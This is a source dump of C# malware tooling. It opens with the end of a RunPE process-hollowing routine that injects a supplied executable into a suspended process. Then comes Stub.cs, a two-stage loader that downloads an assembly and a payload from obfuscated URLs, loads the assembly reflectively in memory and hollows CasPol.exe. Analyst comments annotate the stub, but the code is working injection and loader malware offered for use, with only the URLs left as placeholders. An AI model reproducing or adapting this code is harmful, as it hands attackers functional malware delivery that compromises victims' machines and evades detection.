(HandleRun(path, cmd, data, compatible)) 85 | return true; 86 | } 87 | 88 | return false; 89 | } // Run 90 | private static bool HandleRun(string path, string cmd, byte[] data, bool compatible) 91 | { 92 | int ReadWrite = 0; 93 | string QuotedPath = string.Format("\"{0}\"", path); 94 | 95 | STARTUP_INFORMATION SI = new STARTUP_INFORMATION(); 96 | PROCESS_INFORMATION PI = new PROCESS_INFORMATION(); 97 | 98 | SI.FLAGSS = 0; 99 | SI.Size_ = System.Convert.ToUInt32(System.Runtime.InteropServices.Marshal.SizeOf(typeof(STARTUP_INFORMATION))); 100 | 101 | try 102 | { 103 | if (!string.IsNullOrEmpty(cmd)) 104 | QuotedPath = QuotedPath + " " + cmd; 105 | 106 | if (!CreateProcess_API(path, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, 
false, 4, System.IntPtr.Zero, null, ref SI, ref PI)) 107 | throw new System.Exception(); 108 | 109 | int FileAddress = System.BitConverter.ToInt32(data, 60); 110 | int ImageBase = System.BitConverter.ToInt32(data, FileAddress + 52); 111 | 112 | int[] Context_ = new int[179]; 113 | Context_[0] = 65538; 114 | 115 | if (System.IntPtr.Size == 4) 116 | { 117 | if (!GetThreadContext_API(PI.TihradHandle, Context_)) 118 | throw new System.Exception(); 119 | } 120 | else if (!Wow64GetThreadContext_API(PI.TihradHandle, Context_)) 121 | throw new System.Exception(); 122 | 123 | int Ebx = Context_[41]; 124 | int BaseAddress = 0; 125 | 126 | if (!ReadProcessMemory_API(PI.HasanHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite)) 127 | throw new System.Exception(); 128 | 129 | if (ImageBase == BaseAddress) //Developer İntrusive 130 | { 131 | if (!(NtUnmapViewOfSection_API(PI.HasanHandle, BaseAddress) == 0)) 132 | throw new System.Exception(); 133 | } 134 | 135 | int SizeOfImage = System.BitConverter.ToInt32(data, FileAddress + 80); 136 | int SizeOfHeaders = System.BitConverter.ToInt32(data, FileAddress + 84); 137 | 138 | bool AllowOverride = false; 139 | int NewImageBase = VirtualAllocEx_API(PI.HasanHandle, ImageBase, SizeOfImage, 12288, 64); // R1 //Developer İntrusive 140 | 141 | //Developer İntrusive //Developer İntrusive 142 | 143 | if (!compatible && NewImageBase == 0) 144 | { 145 | AllowOverride = true; 146 | NewImageBase = VirtualAllocEx_API(PI.HasanHandle, 0, SizeOfImage, 12288, 64); 147 | } 148 | 149 | if (NewImageBase == 0) 150 | throw new System.Exception(); 151 | 152 | 153 | if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase, data, SizeOfHeaders, ref ReadWrite)) 154 | throw new System.Exception(); 155 | 156 | int SectionOffset = FileAddress + 248; 157 | short NumberOfSections = System.BitConverter.ToInt16(data, FileAddress + 6); 158 | 159 | for (int fri = 0; fri <= NumberOfSections - 1; fri++) 160 | { 161 | int VirtualAddress = System.BitConverter.ToInt32(data, 
SectionOffset + 12); 162 | int SizeOfRawData = System.BitConverter.ToInt32(data, SectionOffset + 16); 163 | int PointerToRawData = System.BitConverter.ToInt32(data, SectionOffset + 20); 164 | 165 | if (!(SizeOfRawData == 0)) 166 | { 167 | byte[] SectionData = new byte[SizeOfRawData - 1 + 1]; 168 | System.Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length); 169 | 170 | if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite)) 171 | throw new System.Exception(); 172 | } 173 | 174 | SectionOffset += 40; 175 | } 176 | 177 | byte[] PointerData = System.BitConverter.GetBytes(NewImageBase); 178 | if (!WriteProcessMemory_API(PI.HasanHandle, Ebx + 8, PointerData, 4, ref ReadWrite)) 179 | throw new System.Exception(); 180 | 181 | int AddressOfEntryPoint = System.BitConverter.ToInt32(data, FileAddress + 40); 182 | 183 | if (AllowOverride) 184 | NewImageBase = ImageBase; 185 | Context_[44] = NewImageBase + AddressOfEntryPoint; 186 | 187 | if (System.IntPtr.Size == 4) 188 | { 189 | if (!SetThreadContext_API(PI.TihradHandle, Context_)) 190 | throw new System.Exception(); 191 | } 192 | else if (!Wow64SetThreadContext_API(PI.TihradHandle, Context_)) 193 | throw new System.Exception(); 194 | 195 | if (ResumeThread_API(PI.TihradHandle) == -1) 196 | throw new System.Exception(); 197 | } 198 | catch 199 | { 200 | System.Diagnostics.Process Pros = System.Diagnostics.Process.GetProcessById(System.Convert.ToInt32(PI._processıd)); 201 | if (Pros != null) 202 | Pros.Kill(); 203 | 204 | return false; 205 | } 206 | 207 | return true; 208 | } 209 | } 210 | 211 | } 212 | 213 | //Developer İntrusive 214 | //Developer İntrusive 215 | //Developer İntrusive 216 | //Developer İntrusive -------------------------------------------------------------------------------- /Stub.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Net; 3 | using 
System.Reflection;
using System.Text;



namespace Stub
{

    // Analyst note: two-stage in-memory loader stub. It downloads a .NET assembly and a
    // second byte payload from hard-coded, base64-obfuscated URLs, loads the assembly
    // from memory (nothing is written to disk), and invokes a method on it by name,
    // handing over the second payload together with a host process path.
    // Detection-relevant observables: two outbound downloads from the stub process,
    // TLS 1.2 explicitly forced, Assembly.Load from a byte[] (reflective loading),
    // and the literal CasPol.exe path passed as the first argument of the invoked method.
    internal static partial class Program
    {

        // Entry point. No exception handling anywhere: a failed download, an undecodable
        // URL literal, a missing type or a missing method all terminate the process
        // with an unhandled exception.
        [STAThread]
        private static void Main()
        {

            // Forces TLS 1.2 for both WebClient downloads below.
            ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;


            WebClient webClient = new WebClient();


            // First stage: URL of the loader assembly, stored base64-encoded and decoded at runtime
            // (the literal here is a placeholder the author fills in).
            string rawww = Encoding.UTF8.GetString(Convert.FromBase64String("Runpe Process Hollowing Direct Link Base64 Encode"));

            // Raw assembly bytes; never validated (no hash/signature check) before Assembly.Load.
            byte[] ByrawAssembly = webClient.DownloadData(rawww);



            WebClient webClient2 = new WebClient();

            // Second stage: URL of the payload handed to the loaded assembly, same obfuscation.
            string asdasdasdas = Encoding.UTF8.GetString(Convert.FromBase64String("Hollowing File or Malware link"));

            Uri address = new Uri(asdasdasdas);

            byte[] array6 = webClient2.DownloadData(address);
            // Arguments forwarded verbatim to the invoked method: host process path, an empty
            // command line, the second-stage bytes, and a bool. Presumably these map to the
            // RunPE method's (path, args, payload, compatible) parameters — confirm against Runpe.cs.
            object obj = new object[]
            {
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\CasPol.exe",
                string.Empty,
                array6,
                true
            };
            // Null target: the method is invoked as a static member.
            string target = null;
            // Reflective load from memory; the assembly never touches disk.
            Assembly assembly = Assembly.Load(ByrawAssembly);
            // Type and method names are placeholders resolved at runtime; a mismatch throws
            // (GetType returns null -> NullReferenceException, or MissingMethodException).
            assembly.GetType("Projectname.Classname").InvokeMember("RunMethodName", BindingFlags.InvokeMethod, null, target, (object[])obj);







        }


    }
}

